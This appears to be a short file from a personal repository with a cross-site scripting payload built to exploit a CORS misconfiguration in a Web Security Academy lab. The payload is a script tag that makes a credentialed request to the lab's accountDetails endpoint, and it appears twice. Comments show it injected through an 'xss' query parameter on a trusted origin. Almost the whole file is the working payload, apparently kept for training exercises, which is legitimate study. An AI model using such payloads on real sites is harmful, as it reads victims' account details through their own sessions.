enderphan94/xss_cors.js

## xss_cors.js
<script>var req = new XMLHttpRequest(); req.open('get','https://acb01fc81f8f9958806a0dee004900a5.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send();</script>

//https://trusted-origin.example.com/?xss=<script>CORS-ATTACK-PAYLOAD</script>
//if it does not pop-up, double-check in the console
	<script>var req = new XMLHttpRequest(); req.open('get','https://acb01fc81f8f9958806a0dee004900a5.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send();</script>

	//https://trusted-origin.example.com/?xss=<script>CORS-ATTACK-PAYLOAD</script>
	//if it does not pop-up, double-check in the console